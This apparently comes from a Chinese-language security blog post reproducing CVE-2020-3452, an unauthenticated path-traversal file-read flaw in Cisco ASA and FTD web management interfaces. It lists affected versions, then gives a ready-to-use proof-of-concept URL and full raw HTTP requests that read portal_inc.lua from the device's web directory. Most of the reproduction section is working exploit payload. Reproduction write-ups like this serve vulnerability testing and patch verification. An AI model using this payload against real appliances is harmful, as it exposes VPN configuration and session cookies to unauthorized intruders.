# CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
**一、漏洞描述:**
Cisco Adaptive Security Appliance (ASA)
防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。
**二、影响范围**
以下是CVE-2020-3452漏洞受影响的系统版本:
Cisco ASA 设备影响版本:
* <9.6.1 * 9.6 < 9.6.4.42 * 9.71 * 9.8 < 9.8.4.20 * 9.9 < 9.9.2.74 * 9.10 < 9.10.1.42 * 9.12 < 9.12.3.12 * 9.13 < 9.13.1.10 * 9.14 < 9.14.1.10 Cisco FTD设备影响版本: * 6.2.2 * 6.2.3 < 6.2.3.16 * 6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1 * 6.4.0 < 6.4.0.9 + Hot Fix * 6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020) * 6.6.0 < 6.6.0.1 **三、漏洞复现** POC: ```bash /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ ``` 详细数据包 ```bash GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 Host: 127.0.0.1 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.9 Cookie: webvpnlogin=1; webvpnLang=en ``` ```bash GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 Host: 127.0.0.1 Content-Length: 2 ```
暂无评论内容